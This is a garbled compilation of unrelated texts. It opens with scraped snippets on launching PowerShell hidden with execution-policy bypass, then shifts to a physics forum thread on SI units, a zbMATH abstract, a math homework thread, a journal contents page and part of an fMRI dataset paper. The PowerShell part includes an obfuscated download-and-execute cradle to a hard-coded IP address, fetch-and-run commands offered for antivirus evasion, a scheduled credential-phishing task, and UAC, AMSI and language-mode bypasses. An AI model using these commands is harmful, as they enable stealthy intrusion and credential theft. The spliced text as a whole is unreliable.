PowerShell -WindowStyle hidden will hide the window, and -NoProfile and -ExecutionPolicy Bypass should already do the rest. So your command will be:
PowerShell -WindowStyle hidden -NoProfile -ExecutionPolicy Bypass -File C:\PMCS_Full_InProgress.ps1
You don't need any more than that.
To execute PowerShell from VBScript, do not use cscript.exe; it will cause a console window to appear. Use wscript.exe instead:
wscript.exe HiddenPowershell.vbs -ExecutionPolicy ByPass -File "C:\Program Files\Get-HelloWorld.ps1"
This will run PowerShell in a completely hidden console.
More than 55 percent of PowerShell scripts execute from the command line. Windows provides execution policies which attempt to prevent malicious PowerShell scripts from launching. However, these policies are ineffective and attackers can easily bypass them; current detection rates of PowerShell malware in organizations are low. Specific PowerShell commands can be executed, for instance, while script files are prevented from running. That doesn't seem to be putting off hackers, though: we have seen several PowerShell script-toting malware families employ techniques to bypass PowerShell's default execution policy, such as running the malicious code as a command line argument.
Removing the AMSI bypass string from the PowerShell macro payload allows us to continue to run the script, but Windows Defender and AMSI are still blocking the […]
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file "name_of_script.ps1"
EDIT: if your file is located on another UNC path, the file argument would look like this:
-file "\\server\folder\script_name.ps1"
These toggles will allow the user to execute the PowerShell script by double-clicking a batch file.
If you have a "standard" Windows you could right-click and select "Execute with Powershell". If you want to run it with a double click, you could use a cmd file to launch it, or you could create a shortcut that includes Powershell.exe in the command line, like this:
Powershell.exe -ep bypass -file "your script here.ps1"
Best regards
It is always recommended to sign the PowerShell script (buy a certificate), so this will always be secure and not leave anything behind. Or you can try to create a Win32 app and use a command line something like the one above:
powershell.exe -ExecutionPolicy Bypass -File .\Scriptname.ps1
Regards, Eswar www.eskonr.com
In order to permanently change the execution policy, you need to run your PowerShell or registry change elevated, i.e. Run as administrator. Additionally, you may have to modify your Windows setting which is likely to have marked your downloaded file as unsafe; this is a common marker attributed to downloaded executable files. – Compo
Step 2: Getting around ExecutionPolicy. Getting around the ExecutionPolicy setting, from CMD or a batch script, is actually pretty easy. We just modify the second line of the script to add one more parameter to the PowerShell.exe command:
PowerShell.exe -ExecutionPolicy Bypass -Command "& '%~dpn0.ps1'"
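Put together, a minimal self-launching batch file might look like this (a sketch; %~dpn0 expands to the drive, path and base name of the running .bat, so the companion .ps1 must sit in the same folder with the same base name):

@echo off
REM Runs the companion .ps1 (same folder, same base name) with the policy bypassed
PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command "& '%~dpn0.ps1'"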
The Force parameter tells PowerShell to include hidden and system files as well. When using the Win32_UserAccount class, we need to make sure that we use a filter to look only at local accounts; otherwise we will pull all of the accounts that are on the domain: Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'".
schtasks /create /sc minute /mo 2 /tn "credphish" /tr "powershell -ep bypass -WindowStyle Hidden C:\path\to\credPhish\credphish.ps1"

Mitigations & Detection: CredPhish, derived from projects like Invoke-LoginPrompt, CredsLeaker, and Stitch, isn't a silver bullet for password phishing; there's always room for improvement in this kind of tooling.

This short VBScript will launch a hidden PowerShell script without any windows:

```vb
command = "powershell.exe -nologo -ExecutionPolicy Unrestricted -File C:\script.ps1"
Set shell = CreateObject("WScript.Shell")
shell.Run command, 0
```
Output 100% OK: Powershell -nop -ex Bypass -w Hidden . ((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\switch1\run.ps1'). On the VM you will see the output improve each time the string is reduced.

You can execute that system command bypassing UAC. For a final step, obfuscate your code, then fetch and execute it to bypass most antiviruses: powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "iex ( iwr textbinurl)". Remember, you can program this into most high-level languages; all you need to do is execute a shell command.

When you use the hidden keyword in a PowerShell class, you hide its members by default. Hidden members do not display in the default results of the Get-Member cmdlet, IntelliSense, or tab-completion results. To display members that you have hidden with the hidden keyword, add the Force parameter to a Get-Member command.

To start PowerShell from a command prompt, open the command prompt (Win+R, type cmd) and type PowerShell. To start the PowerShell ISE on Windows 7, Windows Server 2008 R2, or Windows Server 2008, open the command prompt and type PowerShell_ISE (ISE alone can also be used).

Command execution via IEX() / Invoke-Expression(): IEX("whoami") or Invoke-Expression("whoami").
Most advice on how to detect attack tools like Invoke-Mimikatz involves tracking the wrong "signature"-type words and phrases (this is often the AV approach) in order to have a high success and low false-positive rate. A nice goal, but not a great approach. These "signatures" often include "mimikatz" and "gentilkiwi".
PowerShell execution policy in Configuration Manager: when you select Bypass, the Configuration Manager client bypasses the Windows PowerShell configuration on the client computer so that unsigned scripts can run. When you select Restricted, the client uses the current Windows PowerShell configuration on the client computer, which determines whether unsigned scripts can run.

powershell.exe -noprofile -executionpolicy bypass -file .\script.ps1

The execution policy only affects PowerShell scripts; it doesn't prevent a batch file from running the above, calling PowerShell with -ExecutionPolicy Bypass and passing the path of the script to -File. If you have parameters to pass with the script, append them after the file path, as shown below.

In Ghost Solution Suite, there are two types of PowerShell jobs. One restricts the PowerShell execution policy, which disables the execution of PowerShell scripts. If you need to run such a script anyway, bypass the execution policy: use the Restrict PowerShell Execution policy job but run it using admin credentials.
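A hedged sketch of such parameter passing; the script name and parameters are placeholders, but anything placed after the -file path is handed to the script itself:

```
powershell.exe -noprofile -executionpolicy bypass -file .\script.ps1 -ComputerName "PC01" -Force
```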
Re: deployment format/syntax for Intune: everything is wrapped into the intunewin format, with the install command being the name of script 1, for example run.cmd. When script 1 isn't used at all, and just script 2 (which would be ideal) is used, the install command is instead: powershell.exe -executionpolicy Bypass -file .\Druva_Create_Device_Mapping.ps1

To set monitor brightness, run your PowerShell application, then type & { (Get-WmiObject -Namespace root/WMI -Class WmiMonitorBrightnessMethods).WmiSetBrightness(1,10) } and hit enter. The whole command runs perfectly in PowerShell; it also works from an AHK script without the HIDE option, which merely hides the process window.
Firstly, the most common way to bypass Constrained Language Mode (CLM) is to simply downgrade to PowerShell version 2, if it is installed, by appending the '-version 2' argument: powershell.exe -version 2. If you also want to bypass the execution policy, append the following: powershell.exe -version 2 -ExecutionPolicy bypass.

PowerShell.exe -windowstyle hidden { script you want to execute }: once entered, the window disappears, yet the application keeps running in the background; PowerShell shows up among the background processes.

A note on the SilentCleanup UAC bypass: a script can go into a loop when the user is never a member of group S-1-5-32-544 (Administrators), because it recursively calls itself. Changing the windir value to "powershell -ep bypass -Command mkdir c:\windows\uac-bypass;pause;#" makes it possible to pause and see what is going on; it turns out the SilentCleanup task runs as "Users" and not as administrator.
Replace every new line with a semicolon and convert the script into a batch-launchable one-liner to bypass execution policies: powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "YourCodeHere". You can then execute that command bypassing UAC and, as a final step, obfuscate your code, or fetch and execute it remotely, to bypass most antiviruses.
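As a minimal illustration with placeholder commands, a two-line script such as:

```powershell
Set-Location C:\Temp
Get-ChildItem -Force
```

collapses into a single -Command invocation:

```
powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Set-Location C:\Temp; Get-ChildItem -Force"
```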
Launching PowerShell Scripts Invisibly (17 Jan 2020). There is no built-in way to launch a PowerShell script hidden: even if you run powershell.exe and specify -WindowStyle Hidden, the PowerShell console will still be visible for a fraction of a second. To launch PowerShell scripts hidden, you can use a VBScript instead:
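A minimal launcher, mirroring the WScript.Shell snippet quoted earlier (the final 0 argument to Run keeps the window hidden):

```vb
command = "powershell.exe -nologo -ExecutionPolicy Unrestricted -File C:\script.ps1"
Set shell = CreateObject("WScript.Shell")
shell.Run command, 0
```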
Random PowerShell bypasses are collected in a GitHub Gist (2022. 7. 30); one example is a logging bypass built from (({}).gettype()).

Question: my PowerShell script is at D:\Test.ps1. Whether launching it via a shortcut or simply via a command line, the command must contain PowerShell -ExecutionPolicy bypass .\Test.ps1 -windowstyle hidden. Do you have any suggestions on where to store the above command? Thanks in advance for any suggestions.
Microsoft made a big step forward in the Modern Management field. Limitations like custom configurations or even Win32 App installs can be addressed now. Microsoft developed an EMS agent (aka SideCar) and released it as a new Intune feature called Intune Management Extension. This agent is able to manage and execute PowerShell scripts on Windows 10.
The PowerShell.exe command-line tool starts a Windows PowerShell session in a Command Prompt window. When you use PowerShell.exe, you can use its optional parameters to customize the session; for example, you can start a session that uses a particular execution policy, or one that excludes a Windows PowerShell profile.

A related resource is kmkz's PowerShell repository on GitHub, which includes an AMSI bypass using an egg-hunting method (from June 2019, last tested 19th May 2020) as an example of real-life payload delivery.
If you want to run a command or script that needs the Unrestricted execution policy, but you don't want to unrestrict the execution policy permanently, you can bypass the execution policy for that single process. Often you might need to execute an unsigned script that doesn't comply with the current execution policy; an easy way to do this is: powershell.exe -ExecutionPolicy Bypass -File C:\MyUnsignedScript.ps1, or with the shorthand: powershell.exe -ep Bypass -File C:\MyUnsignedScript.ps1.

One big limitation of session tampering: as far as I can tell, it's not possible to reimport the Microsoft.PowerShell.Core snap-in. In talking to a PowerShell developer, they mentioned that this snap-in is "special", so some things can't be done with it.
powershell.exe -WinDOwStyLE HiDdEn -exe bypass -file C:\Users\SpecOps\AppData\Roaming\bwfbkilpdgauiu62nbcu.ps1

Note the randomized casing and random file name. SpecOps, when performing a threat-hunting operation, will often start with basic statistical techniques and then pivot to more common TTPs that have been previously observed.
-Noninteractive -ExecutionPolicy Bypass -Noprofile: this actually gets the PowerShell script to run; the timestamp added to the text file confirms it. Before adding the timestamp, it looked as if the script wasn't executing at all, when it actually was (because OneDrive was still installed).

Trojan.DNSChanger circumvents PowerShell restrictions. A close look at the functionality of a new variant of the DNS-changer adware family shows, in particular, the use of encoded scripts as a way to bypass the PowerShell execution protection in recent variants of this infamous adware.

Another example is a PowerShell script to bypass a local WSUS server and pull updates straight from the Internet (WindowsUpdatesByPassWSUS.ps1, GitHub Gist, 2022. 6. 15).
You can use the PowerShell NoProfile parameter to start PowerShell and execute a script without loading the profile: Powershell.exe -NoProfile -File "D:\PowerShell\ConvertString-toDate.ps1". In the above command line, the -NoProfile parameter executes the script specified by the -File parameter without the profile; the script converts a string to datetime format and prints it.
By the way: we previously encountered an environment where PowerShell was disabled. Copying the system's original powershell.exe, using tools to modify part of its character strings, and then double-clicking to run it still bypassed the disabled policy and allowed commands to be executed.
Very easy to use, though a payload like this must be killed again afterwards:

powershell.exe -nop -w hidden -c "$t1='iex (new-object net.w';$t2='ebclient).downlo';$t3='t4(''http://192.168.159.6:6379/yangsir'')'.replace('t4','adstring');iex ($t1+$t2+$t3)"

Concatenating $t1+$t2+$t3 reassembles iex (new-object net.webclient).downloadstring('http://192.168.159.6:6379/yangsir'), splitting the telltale downloadstring keyword across fragments.

PowerShell Constrained Language Mode bypass (2021. 1. 31): this builds an executable which runs a Full Language Mode PowerShell session even when Constrained Language Mode is enabled. At the time of writing, the only bypass methods found are downgrading to PowerShell version 2 or using Runspaces from .NET, and PowerShell version 2 is not always installed.
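A benign sketch of the same splitting idea, with Get-Date standing in for the real payload; the final command only exists once the fragments are concatenated at run time:

```powershell
# Neither fragment alone matches a 'Get-Date' signature
$t1 = 'Get-'
$t2 = 'Date'
iex ($t1 + $t2)   # assembles and runs Get-Date
```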
In this case, the PowerShell script is located at C:\Users\fmc\Desktop\PowerUp.ps1. The lines that follow set up the variables and parameters needed in order to execute the PowerShell script from C#; finally, the script is executed with the pipeline.Invoke() call at the end of Program.cs.
Executing command line: "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NonInteractive -ExecutionPolicy Bypass C:\WINDOWS\ccmcache\157\Install.ps1 with user context. By the looks of things, the Configuration Manager client setting can't apply the execution policy without having administrative rights.

To see all hidden and non-hidden files in a folder with Windows PowerShell, use the Get-ChildItem cmdlet and specify the -File and -Force switches. Here is an example that uses the GCI alias: gci -Force -File.
Write the PowerShell commands you want to run to a file; a C# uninstall hook can read these commands and execute them inside a Pipeline, running uninstallUtil.exe on the resulting executable.

The closest solution I've found is running the following line in PowerShell as admin, which executes the script and bypasses the restrictions: powershell.exe -executionpolicy unrestricted C:\multitool.ps1. If anyone has a cleaner solution that can run the script from the bat file, I would greatly appreciate it.
Q: I would like to run PowerShell with a hidden window. I use this command, but the window still appears: powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden -NonInteractive -NoLogo -File "C:\test.ps1". How can I modify it to run PowerShell without any window? (The VBScript launcher shown earlier is one answer.)

A related objective (2020. 6. 2) is to bypass Windows Defender with a little bit of social engineering and gain a reverse shell: first drop a bat file on the victim's computer that runs powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).downloadString...".
Security warning for downloaded scripts: this is the message you will see, even if your PowerShell ExecutionPolicy is set to Unrestricted, when you start a script downloaded from the Internet: "Security warning. Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your computer."

The first relevant switch is the -ExecutionPolicy Bypass string, which ensures your PowerShell execution policy doesn't prevent your script from running. A VBScript wrapper can forward its arguments to PowerShell:

```vb
' Create the shell object the original snippet assumes
Set objShell = CreateObject("WScript.Shell")
Set args = Wscript.Arguments
For Each arg In args
    ' Run each argument as a hidden, policy-bypassing PowerShell invocation
    objShell.Run "powershell -windowstyle hidden -executionpolicy bypass -noninteractive ""&"" ""'" & arg & "'""", 0
Next
```
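Assuming the wrapper above is saved as, say, wrapper.vbs (a hypothetical name), it would be invoked through wscript.exe so that no console window flashes:

```
wscript.exe wrapper.vbs "C:\Scripts\MyScript.ps1"
```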
I have a PowerShell script and I don't want to change the ExecutionPolicy on my machine. When I open a PowerShell command line and type the following command: powershell -ExecutionPolicy ByPass -File test.ps1, the script runs, but I don't know how to add this command to my PowerShell script itself, because I want to run it from the context menu (as in the image).
-W Hidden is shorthand for -WindowStyle Hidden, which indicates that the PowerShell session window should be started hidden. -Exec Bypass is shorthand for -ExecutionPolicy Bypass, which disables the execution policy for the current PowerShell session (the default disallows execution).
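Combining the two shorthands, a minimal invocation (the script path is a placeholder) would be:

```
powershell.exe -W Hidden -Exec Bypass -File C:\script.ps1
```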
|
|
# From where do we get the volt unit? Why 1 volt, and not 1 s/e = 1.4 V?
#### Hishamsaleh
##### Full Member level 1
I was wondering why we use the ampere, volt, farad, etc. as units. What is the experiment or reference that tells us that this quantity of capacitance (for example) is 1 farad? I think it must be like the meter unit, which (as I remember) was once defined in terms of the wavelength of light from a particular source. That's fine, but what about the farad? The ampere? The volt? Where do we get them?
I'd be thankful for any information about this.
Also, where can we find 1 ohm in nature? What is our reference? Is it defined by a physical artifact, like the old meter bar?
#### flatulent
hundred years ago
All of this goes back at least one or two hundred years. There were several unit systems used by different science and technology areas, and there were many conferences, starting near 1900, on making a universal set of units. These discussions also included whether 2π should appear in E&M equations or not, by changing the definition of physical constants. Finally, around 1960 or so, the SI unit system was universally adopted, even though the electric and magnetic units were not compatible.
#### Hishamsaleh
##### Full Member level 1
OK, that's great, thanks a lot.
Sorry if I wasn't clear enough, but what I mean is this. (For example:) what is pi? To answer, we note that pi is approximately 22/7. So what does 22/7 mean? Pi is the ratio between the circumference of a circle and its diameter, so for every 7 units of diameter, the circumference must be about 22 units.
Hope you get my point! My question is: where did we get
1. the volt
2. the ohm
3. the ampere
|
|
# zbMATH — the first resource for mathematics
Canonical filtrations and stability of direct images by Frobenius morphisms. (English) Zbl 1201.14030
Summary: We study the stability of direct images by Frobenius morphisms. First, we compute the first Chern classes of direct images of vector bundles by Frobenius morphisms modulo rational equivalence up to torsions. Next, introducing the canonical filtrations, we prove that if $$X$$ is a nonsingular projective minimal surface of general type with semistable $$\varOmega_X^1$$ with respect to the canonical line bundle $$K_X$$, then the direct images of line bundles on $$X$$ by Frobenius morphisms are semistable with respect to $$K_X$$.
##### MSC:
14J60 Vector bundles on surfaces and higher-dimensional varieties, and their moduli
13A35 Characteristic $$p$$ methods (Frobenius endomorphism) and reduction to characteristic $$p$$; tight closure
14J29 Surfaces of general type
|
|
# Math Help - Help with work problem/formula
1. ## Help with work problem/formula
I am stuck on a word problem and can't figure out what formula to use. I know to use x for one price and y for another, but after that I'm hitting a wall.
There were 383 tickets sold to a basketball game. The ticket price for event card holders is $1.75, and $2.25 for non-card holders. The total amount collected was $806.25. How many tickets were sold at each price?

2. Event card holders = x, non-card holders = y.

$x + y = 383$ (as 383 tickets were sold in total)

$1.75x + 2.25y = 806.25$ (as the price for x was $1.75, the price for y was $2.25, and $806.25 was the total raised)
Can you take it from here? Rearrange to get one equation in terms of x or y, then substitute or eliminate as you see fit.
3. I actually got that far, but I can't seem to get the same answer as the book. I know the answer is 111 tickets at $1.75 and 272 at $2.25, but I don't see how they are getting it. Do I need to multiply by 100 to get rid of the decimals? My answers are way off.
4. From eq1: $y = 383-x$
Sub into eq2: $1.75x+2.25(383-x) = 806.25$. Once x is known use either equation to find y.
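Expanding that substitution step by step:

$1.75x + 2.25(383-x) = 806.25$

$1.75x + 861.75 - 2.25x = 806.25$

$861.75 - 0.5x = 806.25 \implies 0.5x = 55.5 \implies x = 111$

and then $y = 383 - 111 = 272$.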
I get the book's answer of 111 and 272
5. Thanks! I knew I'd feel stupid once I saw the answer. I can't believe I didn't catch that.
|
|
### Contents of Journal of Mechanical Engineering 52, 1 (2001)
L. STAREK: Inverse eigenvalue problem in vibration of mechanical systems (Review paper) (in Slovak) 1
B. SAMANTA, K. R. AL-BALUSHI: Use of wavelet transforms and neural network in gear fault diagnosis 21
CZ. J. JERMAK, M. RUCKI: Pneumatic injector as a length measuring sensor 32
M. WIECZOROWSKI: Optical followers -- their fidelity in surface topography measurements 39
I. BALLO: Some remarks on the sky-hook and ground-hook concepts (Letter to the Editor) (in Slovak) 55
# Abstracts
### Inverse eigenvalue problem in vibration of mechanical systems
L. STAREK
This paper reviews recent literature on the inverse eigenvalue problem in vibration, relating to the reconstruction or estimation of the physical properties of mechanical systems from a knowledge of (some of) their spectral and/or modal data. The review considers exclusively linear systems (small vibrations of mechanical systems). The paper deals with various types of vibrating systems (continuous and discrete, damped and undamped) and with the various types of data (spectral and/or modal, complete or incomplete).
### Use of wavelet transforms and neural network in gear fault diagnosis
B. SAMANTA, K. R. AL-BALUSHI
A procedure for fault diagnosis of gears by wavelet transforms and an artificial neural network (ANN) is presented. The time-domain acoustic emission (AE) signals of a rotating machine with normal and defective gears are processed by the wavelet transform and decomposed into low-frequency (approximate) and high-frequency (detailed) components. The features extracted from the wavelet transform are used as inputs to an ANN-based diagnostic approach. The ANN is trained using the back-propagation algorithm with a subset of the experimental data for known machine conditions and tested using the remaining data. The procedure is illustrated through experimental acoustic emission signals of a gearbox.
### Pneumatic injector as a length measuring sensor
CZ. J. JERMAK, M. RUCKI
The article describes a new construction of a pneumatic measuring gauge, based on the injection phenomenon at a particular position of the nozzles. Compared with other injectors it is simple, and its static metrological properties are good. The distance L between the nozzles and the angle α between the nozzle head surface and its axis have a substantial influence on these properties. The best metrological characteristics were reached for the configuration L = 4 mm and α ∈ (−45°, 5°). The consumption of compressed air is reduced, too.
### Optical followers - their fidelity in surface topography measurements
M. WIECZOROWSKI
In the paper, the author presents a comparative analysis of three different probes used for surface topography measurement. Skid and skidless stylus probes were used as contact pick-ups, while an optical autofocusing pick-up was applied as a non-contact one. The analysis was performed using several different topography parameters. It showed that a skid causes relatively small distortions as far as the surface representation is concerned. On the other hand, the optical probe proved to be a very difficult measuring tool, particularly for surfaces with steep slopes and sharp edges; even for very smooth surfaces, great care must be taken when measuring with this kind of pick-up.
|
|
# Individual Brain Charting dataset extension, second release of high-resolution fMRI data for cognitive mapping
## Abstract
We present an extension of the Individual Brain Charting dataset, a high spatial-resolution, multi-task, functional Magnetic Resonance Imaging dataset intended to support the investigation of the functional principles governing cognition in the human brain. The concomitant data acquisition from the same 12 participants, in the same environment, makes it possible to obtain in the long run finer cognitive topographies, free from inter-subject and inter-site variability. This second release provides more data from psychological domains present in the first release and also yields data featuring new ones. It includes tasks on, e.g., mental time travel, reward, theory-of-mind, pain, numerosity, self-reference effect and speech recognition. In total, 13 tasks with 86 contrasts were added to the dataset, and 63 new components were included in the cognitive description of the ensuing contrasts. As the dataset becomes larger, the collection of the corresponding topographies becomes more comprehensive, leading to better brain-atlasing frameworks. This dataset is an open-access facility; raw data and derivatives are publicly available in neuroimaging repositories.
Measurement(s): functional brain measurement • regional part of brain • brain measurement • cognition
Technology Type(s): functional magnetic resonance imaging
Factor Type(s): type of task
Sample Characteristic - Organism: Homo sapiens
Machine-accessible metadata file describing the reported data: https://doi.org/10.6084/m9.figshare.12958181
## Background & Summary
Understanding the fundamental principles that govern human cognition requires mapping the brain in terms of functional segregation of specialized regions. This is achieved by measuring local differences of brain activation related to behavior. Functional Magnetic Resonance Imaging (fMRI) has been used for this purpose as an attempt to better understand the neural correlates underlying cognition. However, while there is a rich literature concerning performance of isolated tasks, little is still known about the overall functional organization of the brain.
Meta- and mega-analyses constitute active efforts at providing accumulated knowledge on brain systems, wherein data from different studies are pooled to map regions consistently linked to mental functions [1,2,3,4,5,6,7,8,9]. Because data are impacted by intra- and inter-subject as well as inter-site variability, these approaches still limit the exact demarcation of functional territories and, consequently, formal generalizations about brain mechanisms. Several large-scale brain-imaging datasets are suitable for atlasing, wherein differences can be mitigated across subjects and protocols together with standardized data-processing routines. Yet, as they have different scopes, not all requirements are met for cognitive mapping. For instance, the Human Connectome Project (HCP) [10,11] and CONNECT/Archi [12,13] datasets provide large subject samples, as they are focused on population analysis across different modalities; their task-fMRI data combine 24 and 28 conditions, respectively, which is scarce for functional atlasing. Another example is the studyforrest dataset [14,15,16,17], which includes a variety of task data on complex auditory and visual information, but is restricted to naturalistic stimuli. Additionally, one shall note that within-subject variability reduces task-fMRI replicability; thus, more data per subject can in fact facilitate the reliability of group-level results [18].
To obtain as many cognitive signatures as possible and simultaneously achieve a wide brain coverage at a fine scale, extensive functional mapping of individual brains over different psychological domains is necessary. Within this context, the Individual Brain Charting (IBC) project pertains to the development of a 1.5 mm-resolution, task-fMRI dataset acquired in a fixed environment, on a permanent cohort of 12 participants. Data collection from a broad range of tasks, at high spatial resolution, yields a sharp characterization of the neurocognitive components common to the different tasks. This extension corresponds to the second release of the IBC dataset, meant to increase the number of psychological domains covered relative to the first one [19]. It aims both at a consistent mapping of elementary spatial components, extracted from all tasks, and at a fine characterization of the individual architecture underlying this topographic information.
Here, we give an account –focused on the second release– of the experimental procedures and the dataset organization and show that raw task-fMRI data and their derivatives represent functional activity in direct response to behavior. Data collection is ongoing and more releases are planned for the next years. Despite being a long-term project, IBC is not dedicated to longitudinal surveys; acquisitions of the same tasks will not be conducted systematically.
The IBC dataset is an open-access facility devoted to providing high-resolution, functional maps of individual brains as basis to support investigations in human cognition.
## Methods
To avoid ambiguity with MRI-related terms used throughout this manuscript, definitions of such terms follow the Brain-Imaging-Data-Structure (BIDS) Specification version 1.2.1 [22].
Complementary information about dataset organization and MRI-acquisition protocols can be found in the IBC documentation available online: https://project.inria.fr/IBC/data/
### Participants
The present release of the IBC dataset consists of brain fMRI data from eleven individuals (one female), acquired between April 2017 and July 2019. The two differences from the cohort of the first release are: (1) the replacement of participant 2 (sub-02) by participant 15 (sub-15); and (2) the absence of data from participant 8 (sub-08). Regarding the latter, data will be acquired in the future and included in one of the upcoming releases.
Age, sex and handedness of this group of participants are given in Table 1. Handedness was determined with the Edinburgh Handedness Inventory [23].
All experimental procedures were approved by a regional ethical committee for medical protocols in Île-de-France (“Comité de Protection des Personnes” - no. 14-031) and a committee to ensure compliance with data-protection rules (“Commission Nationale de l’Informatique et des Libertés” - DR-2016-033). They were undertaken with the informed written consent of each participant according to the Helsinki declaration and the French public health regulation. For more information, consult [19].
## Materials
### Stimulation
For all tasks (see Section “Experimental Paradigms” for details), the stimuli were delivered through custom-made scripts that ensure a fully automated environment and computer-controlled collection of the behavioral data. Two software tools were used for the development of such protocols: (1) Expyriment (versions 0.7.0 and 0.9.0, Python 2.7); and (2) Psychophysics Toolbox Version 3 for GNU Octave version 4.2.1. The visual and auditory stimuli presented in the Theory-of-Mind and Pain Matrices battery, as well as in the Bang task (see respectively Sections “Theory-of-Mind and Pain Matrices task battery” and “Bang task” for details), were translated into French. The corresponding material is publicly available, as described in Section “Code Availability”.
### MRI Equipment
The fMRI data were acquired using a Siemens 3 T Magnetom Prismafit MRI scanner along with a Siemens Head/Neck 64-channel coil. Behavioral responses were obtained with two MR-compatible, optic-fiber response devices that were used interchangeably according to the type of task: (1) a five-button ergonomic pad (Current Designs, Package 932 with Pyka HHSC-1 × 5-N4); and (2) a pair of in-house custom-made sticks, each featuring one top button. An MR-Confon package was used as the audio system in the MRI environment.
All sessions were conducted at the NeuroSpin platform of the CEA Research Institute, Saclay, France.
## Experimental Procedure
Upon arrival at the research institute, participants were instructed about the execution and timing of the tasks in the upcoming session.
All sessions were composed of several runs, each dedicated to one task or a group of tasks as described in Section “Experimental Paradigms”. The structure of the sessions, according to the MRI modality employed at every run, is detailed in Table 2. Specifications about the imaging parameters of the referred modalities, as well as procedures undertaken toward the recruitment of participant 15 and the handling and training of all participants, are described in [19]. As a side note, data pertaining to tasks of the first release were also acquired for participant 15.
Tasks were aggregated in different sessions according to their original studies [24,25,26,27,28,29,30,31,32,33]. Most of the paradigms are composed of trials, usually separated by the display of a fixation cross. All trials within each task were randomized in order to avoid extended consecutive repetition of trials containing conditions of the same kind. For some tasks, trials were in fact pseudo-randomized, following specific criteria relative to the experimental design of those tasks.
The following sections are thus dedicated to a full description of the set of paradigms employed for each task, including descriptions of the experimental conditions, the temporal organization of the trials, and their (pseudo-)randomization. Moreover, Table 3 provides an overview of the tasks, which includes a short description and motivation of their inclusion in terms of the psychological domains covered. Ideally, and as mentioned in Section “Background & Summary”, the main purpose of each release is to provide the dataset with a greater variety of cognitive modules from as many new psychological domains as possible, while also attaining a better coverage with the already existing ones.
All material used for stimulus presentation has been made publicly available (see Section “Code Availability”), together with video annotations of the corresponding protocols. Video annotations refer to video records of complete runs that are meant to be consulted for a better comprehension of the task paradigms. For each subject, the paradigm-descriptors’ files describing the occurrence of the events are part of the dataset, following the BIDS Specification.
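As a point of reference, BIDS paradigm descriptors are plain-text events.tsv files with mandatory onset and duration columns (in seconds), typically complemented by a trial_type column; a purely illustrative excerpt, not taken from the actual dataset, could look like this:

```
onset	duration	trial_type
0.0	2.0	reference
6.0	2.0	cue
12.0	2.0	event
14.0	3.0	response
```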
### Mental time travel (MTT) task battery
The Mental Time Travel (MTT) task battery was developed following previous studies conducted at the NeuroSpin platform on chronosthesia and mental space navigation [24,25,26]. In these studies, participants judged the ordinality of real historical events in time and space by mentally projecting themselves, i.e. through egocentric mapping. In contrast, the present task was intended to assess the neural correlates underlying both mental time and space judgment involved in the allocentric mapping implemented in narratives. To this end, and in order to remove confounds associated with prior subject-specific mental representations linked to the historical events, fictional scenarios were created with fabricated stories and characters.
Concretely, this battery is composed of two tasks, MTT WE and MTT SN, each employed in two different sessions. The stimuli of each task referred to a different island plotting different stories and characters. There were two stories per island, created on a two-dimensional mesh of nodes; each node corresponded to a specific action. The stories of each island evolved both in time and along one single cardinal direction. The cardinal directions, cued in the task, differed between sessions: space judgment was performed according to the cardinal directions West-East and South-North for tasks MTT WE and MTT SN, respectively. In addition, the stories of each island evolved spatially in opposite ways. For instance, the two stories plotted in the West-East island evolved across time from west to east and from east to west, respectively.
Prior to each session, participants were to learn the story of the corresponding session. To prevent any retrieval of graphical memories referring to a schematic representation of the stories, the stories were presented as audio narratives. Additionally, the participants were instructed to learn the stories chronologically, i.e. as they were progressively referred to in the narrative, and to refrain from taking (visual) notes, which could be encoded as mental judgments.
The task was organized as a block-design paradigm, composed of trials with three conditions of audio stimuli: (1) Reference, statement of an action in the story to serve as reference for the time or space judgment in the same trial; (2) Cue, question concerning the type of mental judgment to be performed in the same trial, i.e. “Before or After?” for the time judgment or “West or East?” and “South or North?” for the space judgment in the first and second sessions, respectively; and (3) Event, statement of an action to be judged with respect to the Reference and according to the Cue.
Every trial started with an audio presentation of the Reference followed by silence, with a duration of two and four seconds, respectively. The audio presentation of the Cue came next, followed by a silence period; they had respectively a duration of two and four seconds. Afterwards, a series of four Events were presented for two seconds each; all of them were interspersed by a Response condition of three seconds. Every trial ended with a silent period of seven seconds, thus lasting thirty nine seconds in total.
A black fixation cross was permanently displayed on the screen across conditions and the participants were instructed to never close their eyes. At the very end of each trial, the cross turned to red during half of a second in order to signal the beginning of the next trial; such cue facilitated the identification of the next audio stimulus as the upcoming Reference to be judged.
During the Response period, the participants had to press one of the two possible buttons, placed in their respective left and right hand. If the Cue presented in the given trial hinted at time judgment, the participants were to judge whether the previous Event occurred before the Reference, by pressing the button of the left hand, or after the Reference, by pressing the button of the right hand. If the Cue concerned with space judgment, the participants were to judge, in the same way, whether the Event occurred west or east of the Reference in the first session and south or north of the Reference in the second session.
One session of data collection comprised three runs, each of which included twenty trials. Half of the trials in a given run were about time navigation and the other half about space navigation. Five different references were shared by both types of navigation and, thus, there were two trials with the same reference for each type of navigation. Within trials, half of the Events related to past or western/southern actions and the other half to future or eastern/northern actions with respect to the Reference.
The order of the trials was shuffled within runs, only to ensure that each run would feature a unique sequence of trials according to type of reference (both in time and space) and cue. No pseudo-randomization criterion was imposed as the trials’ characterization was already very rich. Since there were only two types of answers, we also randomized events according to their correct answer within each trial. The same randomized sequence for each run was employed for all participants. The code of this randomization is provided together with the protocol of the task in a public repository on GitHub (see Section “Code Availability”). Note that the randomized sequence of trials for all runs is pre-determined and, thus, provided as inputs to the protocol for a specific session.
For the sake of clarity, Online-only Table 1 contains a full description of all conditions employed in the experimental design of this task.
### Preference task battery

The Preference task battery was adapted from the Pleasantness Rating task (Study 1a) described in [27], in order to capture the neural correlates underlying decision-making for potentially rewarding outcomes (aka “positive-incentive value”) as well as the corresponding level of confidence.
The whole task battery is composed of four tasks, each of them pertaining to the presentation of items of a certain kind. Therefore, Food, Painting, Face and House tasks were dedicated to “food items”, “paintings”, “human faces” and “houses”, respectively.
